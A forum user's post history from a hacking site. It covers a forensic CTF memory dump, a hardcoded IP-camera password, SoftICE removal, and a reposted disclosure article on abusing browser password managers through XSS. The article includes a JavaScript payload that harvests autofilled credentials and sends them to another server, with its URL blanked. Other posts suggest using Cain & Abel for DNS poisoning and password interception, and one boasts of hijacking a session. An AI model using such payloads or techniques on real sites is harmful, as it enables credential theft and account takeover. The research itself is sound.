Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - neusbeer

Pages: [1] 2 3 ... 8
Hacking and Security / Re: Where do I find modern techniques?
« on: January 09, 2015, 07:41:49 pm »
You can use Cain & Abel for this (if you are a windows user).

you can poison dns, intercept passwords and even bruteforce them with it,
catching urls, etc.

Hacking and Security / Re: help needed for a cyber challenge - level 5
« on: April 21, 2014, 10:49:35 pm »
I can't get it to work, when I add im to virtualbox it's gives errors.
gonna do string searches in the hope to find something.
And try out sleuthkit

Hacking and Security / Re: help needed for a cyber challenge - level 5
« on: April 21, 2014, 10:58:52 am »
Yeah that mail I found, where pjotr is angry and demanding his money.
Used the same way with Wireshark, but I thought I missed something

I wasn't 100% complete with the info, the gave also a vmdk file besides the raw mem file.
it's encrypyted

But maybe I need both files to get the answer.

the pcap is just a part of that memdump, so could be somewhere else in dump.

Hacking and Security / help needed for a cyber challenge - level 5
« on: April 20, 2014, 12:55:53 pm »
Ey guys,

Can anyone help me with this, I'm busy with a cyber challenge, and working on challenge 5.

Story: Pjotr is communicating with somebody else who calls the shots, Pjotr is a hacker or something,
the challenge is about investigating a murder.

Now in challange 5 ...
I got a memory dump (linux), and I have to find
the name of a file (and within that file a username and password) which has been send
by Pjotr, I found 1 mail where he's asking about the money after the file transfer 2 weeks ago.

I can't use Volatility, because I'm not sure which linux rep it is.
I used (in kali linux) bulk_extractor. and got some info (also a pcap)

But still no clue about the asked file.

Any1 can help?  Tips how to read the raw mem.

NB, it's in Dutch :-)


oef..pretty nasty bug indeed..
took 5 sec. to get a sessionid from a site and to log in.

Hacking and Security / Re: password AfXNtpa38x
« on: February 18, 2014, 07:50:30 pm »
Well it's logical that the IP cams use a default password, like many things such as routers and shit. People just forget or don't care enough, to change that password.

True, but this ain't the standard password, that's admin:admin I think.
looks more like vendor password or such.

Hacking and Security / Re: password AfXNtpa38x
« on: February 11, 2014, 11:18:58 pm »
Code: [Select]
around 40 yeah. like password,123456 etc.. ain't that much..
Acunetix uses fast bruteforce with a few standard words to speed up..
(still slow though..)
I think brand password..

Hacking and Security / Re: password AfXNtpa38x
« on: February 11, 2014, 10:35:32 pm »
But why is it in a the wordlist of Acunetix scanner, which uses a small list of often used passwords and the password of a random cam. how big is the chance.

Hacking and Security / password AfXNtpa38x
« on: February 11, 2014, 08:02:57 pm »
I was busy pentesting ip cam's. and found a 'strange' thing.
I use noisy scanning with Acunetix (yeah I'm lazy), and it bruteforce about
40 passwords including this one.
Example log of Acunetix scan: [size=78%][/size]
(see the bruteforce part) note, this ain't my log ;)

When testing a ipcam, the actual password of the HTTP Auth was AfXNtpa38x.
Not really a password you see everyday, and when I google it, there aren't many hits. (only a leak pastebin with also the same password in it.

Why does this (dutch) IP cam have this password.

Am I missing something? is this a standard password for IP cam's of this type or somekind of buildin hardcoded password.

Reverse Engineering / Re: WinICE problem
« on: May 12, 2012, 02:27:25 pm »
found it.. pff took me a few hours.. :P lol

had to delete Registry key: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NTICE

thnxs for the link btw.

Reverse Engineering / Re: WinICE problem
« on: May 12, 2012, 02:13:22 pm »
yeah but no winice.exe
look at the dir structure

Code: [Select]
Het volume in station C heeft geen naam.
 Het volumenummer is 3807-71C9

 Map van C:\Program Files\NuMega

12-05-2012  14:12    <DIR>          .
12-05-2012  14:12    <DIR>          ..
12-05-2012  14:12                 0 dirlist.txt
11-05-2012  23:34    <DIR>          SoftIceNT
               1 bestand(en)                0 bytes

 Map van C:\Program Files\NuMega\SoftIceNT

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05             4.237 CommRef.CNT
25-01-2000  04:05           706.560 Commref.hlp
11-05-2012  23:34    <DIR>          Examples
25-01-2000  04:05            81.997 icedat.dll
25-01-2000  04:05           102.462 IcePACK.exe
25-01-2000  04:05           106.556 KD2SYS.exe
25-01-2000  04:05            36.951 KD2SYSXLAT.exe
25-01-2000  04:05             3.692 loader32.cnt
25-01-2000  04:05         1.855.468 loader32.exe
25-01-2000  04:05           109.091 Loader32.hlp
11-05-2012  23:34    <DIR>          Network
25-01-2000  04:05            98.372 nmsym.exe
25-01-2000  04:05           413.766 nmtrans.dll
25-01-1996  16:36                17 ntice.bat
15-11-1996  16:25             7.398 ntice.ico
20-01-2000  16:29            30.788 Readme.htm
25-01-2000  04:05            16.529 Serial.exe
25-01-2000  04:05            73.788 Serial32.exe
11-05-2012  23:34    <DIR>          Setup
11-05-2012  23:44               314 siload.ini
25-01-2000  04:05           114.746 SINet.exe
25-01-2000  04:05         1.681.120 SoftICE Command Reference.pdf
11-05-2012  23:34            76.086 SoftICE.isu
25-01-2000  04:05         2.273.989 Using SoftICE.pdf
11-05-2012  23:34    <DIR>          Util16
20-11-1996  10:34            67.072 Whatsnew.doc
25-01-2000  04:05            12.409 Wldr.hlp
              23 bestand(en)        7.873.408 bytes

 Map van C:\Program Files\NuMega\SoftIceNT\Examples

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
11-05-2012  23:34    <DIR>          GDIDemo
               0 bestand(en)                0 bytes

 Map van C:\Program Files\NuMega\SoftIceNT\Examples\GDIDemo

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05            15.020 Bounce.c
25-01-2000  04:05             2.298 Bounce.h
25-01-2000  04:05             8.827 Dialog.c
25-01-2000  04:05             6.853 Draw.c
25-01-2000  04:05             1.369 Draw.h
25-01-2000  04:05             8.869 Gdidemo.c
25-01-2000  04:05               743 Gdidemo.def
25-01-2000  04:05             2.863 Gdidemo.h
25-01-2000  04:05               766 Gdidemo.ico
25-01-2000  04:05             4.222 Gdidemo.rc
25-01-2000  04:05             7.091 Init.c
25-01-2000  04:05             1.636 Makefile
25-01-2000  04:05             4.101 Maze.c
25-01-2000  04:05             1.195 Maze.h
25-01-2000  04:05            12.207 Poly.c
25-01-2000  04:05             2.100 Poly.h
25-01-2000  04:05               116 Readme.txt
25-01-2000  04:05             3.012 Wininfo.c
25-01-2000  04:05             7.396 Xform.c
25-01-2000  04:05             1.262 Xform.h
              20 bestand(en)           91.946 bytes

 Map van C:\Program Files\NuMega\SoftIceNT\Network

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
11-05-2012  23:34    <DIR>          3C90X
11-05-2012  23:34    <DIR>          NE2000
               0 bestand(en)                0 bytes

 Map van C:\Program Files\NuMega\SoftIceNT\Network\3C90X

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05            22.542 NETNM3C.inf
25-01-2000  04:05            81.872 NM90XBC4.sys
25-01-2000  04:05            85.080 NM90XBC5.sys
25-01-2000  04:05            95.652 NM90XND4.sys
25-01-2000  04:05            95.092 NM90XND5.sys
25-01-2000  04:05            49.329 OEMSETUP.INF
               6 bestand(en)          429.567 bytes

 Map van C:\Program Files\NuMega\SoftIceNT\Network\NE2000

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05            18.121 NETNMNE.INF
25-01-2000  04:05            18.348 NMNE2K4.sys
25-01-2000  04:05            24.080 NMNE2K5.sys
25-01-2000  04:05            31.202 OEMSETUP.INF
               4 bestand(en)           91.751 bytes

 Map van C:\Program Files\NuMega\SoftIceNT\Setup

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
24-01-1996  13:43                11 AUTOEXEC.NT
24-01-1996  13:44                10 CONFIG.NT
25-01-2000  06:18            24.576 sindos.exe
24-06-1997  17:15               545 SINDOSNT.PIF
25-01-2000  06:18            36.864 sinsetup.dll
25-01-2000  06:18            45.056 SiSetup.exe
25-01-2000  06:18            90.112 sividset.dll
25-01-2000  04:05           241.788 siwvid.sys
22-12-1999  11:26            12.662 Vsetup.ini
               9 bestand(en)          451.624 bytes

 Map van C:\Program Files\NuMega\SoftIceNT\Util16

11-05-2012  23:34    <DIR>          .
11-05-2012  23:34    <DIR>          ..
25-01-2000  04:05           156.160 Dbg2map.exe
25-01-2000  04:05            18.909 Dldr.exe
25-01-2000  04:05             1.763 Dlog.exe
25-01-2000  04:05             4.972 Msym.exe
25-01-2000  04:05             4.111 Util16.txt
25-01-2000  04:05           116.272 Wldr.exe
25-01-2000  04:05            12.409 Wldr.hlp
               7 bestand(en)          314.596 bytes

     Totaal aantal weergegeven bestanden:
              70 bestand(en)        9.252.892 bytes
              26 map(pen)  179.926.364.160 bytes beschikbaar

Reverse Engineering / Re: WinICE problem
« on: May 12, 2012, 12:37:57 pm »
hmmm... taking a closer look. it's SoftIce. (Isn't that the same?)

anyway, don't have winice.exe

but ehm, at the beginning of the installation, he asked to change some registry things.
(Turning debugging on I think)
Any idea where to search in regedit?

Reverse Engineering / WinICE problem
« on: May 12, 2012, 09:50:33 am »
Not sure where to put this question.

I installed WinICE, but I wanna deinstall/deactivate it.
how can I do this?

If I start an other program now I get a message that it won't run
because of there's a debugger running.
It's in win xp sp3, where can I get this option to set off?

Deinstalling WinICE won't work, I still got the same message from the other programs.

Hacking and Security / Re: Abusing Password Managers with XSS
« on: April 26, 2012, 11:05:50 am »
Yep, also it won't work with Opera since it requires users interaction by filling in the passwords.

Hacking and Security / Abusing Password Managers with XSS
« on: April 26, 2012, 10:41:52 am »
First off, I didn't test it. but I find it a good article.

Abusing Password Managers with XSS
By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies.
This will generally prevent an attacker from stealing users session cookies with XSS.
There are ways of circumventing this (e.g. the HTTP TRACE method),
but generally speaking, it is fairly effective.
That being said, an attacker can still cause significant damage
without being able to steal the session cookie.

A variety of client-side attacks are possible,
 but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections
via XSS and thereby submit various forms within the application.
The worst case scenario with this type of attack would be that there is no
confirmation for email address or password changes and the attacker can change usersí passwords.
From an attackerís perspective this is valuable,
but not as valuable as being able to steal a userís session. By reseting the password,
the attacker is giving away his presence and the extent to
which he is able to masquarade as another user is limited.
While stealing the session cookie may be the most commonly cited method for hijacking user accounts,
other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords.
Additionally, users will often install third-party applications to manage their passwords for them.
All of these solutions save time for the user and generally help to prevent forgotten passwords.
Third party password managers such as LastPass are also capable of generating strong,
application specific passwords for users and then sending them off to the cloud for storage.
Functionality such as this greatly improves the overall security of the username/password authentication model.
By encouraging and facilitating the use of strong application specific passwords,
users need not be as concerned with unreliable web applications that inadequately protect their data.
For these and other reasons, password managers such as LastPass are generally
considered within the security industry to be a good idea.
I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly
any attention is how these can be abused by XSS.
Because many of these password managers automatically fill login forms,
an attacker can use JavaScript to read the contents of the form once it has been filled.
The lack of attention this topic receives made me curious to see how exploitable it actually would be.
For the purpose of testing, I built a simple PHP application with a functional
login page aswell as a second page that is vulnerable to XSS (find them here).
I then proceded to experiment with different JavaScript, attempting to steal user
credentials with XSS from the following password managers:

LastPass (Current version as of April 2012)
Chrome (version 17)
Firefox (version 11)
Internet Explorer (version 9)
I first visited my login page and entered my password.
If the password manager asked me if I wanted it to be remembered, I said yes.
I then went to the XSS vulnerable page in my application and experimented with different JavaScript,
attempting to access the credentials stored by the browser or password manager.
I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

Code: [Select]
<script type="text/javascript">// <![CDATA[
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none'
            request=new XMLHttpRequest();
            url = ""+ex_username+"&password="+ex_password;
<div id='xss'>\

<form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>
    <input type='submit' name='login' value='Log In'>\
    inter = window.setInterval("attack()",100);
// ]]></script>
All that this code does it create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason).
Using window.setInterval, while less elegant, is more effective.
If you want to try out the above code,
go to and login (username:user1 password:secret).
Then go to the reflections page and enter the slightly modified code listed there into the text box.
If you told your password manager to remember the password for the site, you should see an alert 
box with the credentials you previously entered.
Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox.
The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin,
meaning that it canít bypass event listeners that are watching for form submissions.
The browsers, on the other hand could put garbage into the form elements in the DOM and wait until
after the onsubmit event has fired to put the real credentials into the form.
This might break some web applications that take action based on the onchange event of the form inputs,
but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesnít work in IE (aside from the non-IE-friendly XHR request)
is that the IE password manager doesnít automatically fill in user credentials.
IE also seems to be the only one of the bunch that ties a set of credentials to a specific page
rather than to an entire domain. While these both may be inconveniences from a usability perspective,
they (inadvertantly or otherwise) improve the security of the password manager.

While this is an attack vector that doesnít get much attention, I think that it should.
XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag.
This flag is largely effective in preventing session hijacking, but user credentials may still be at risk.
While I didnít get a chance to check them out when researching this,
I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability.
If you are a browser or browser-plugin developer or just an ordinary hacker,
leave a comment and let me know what you think.

Pages: [1] 2 3 ... 8

Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.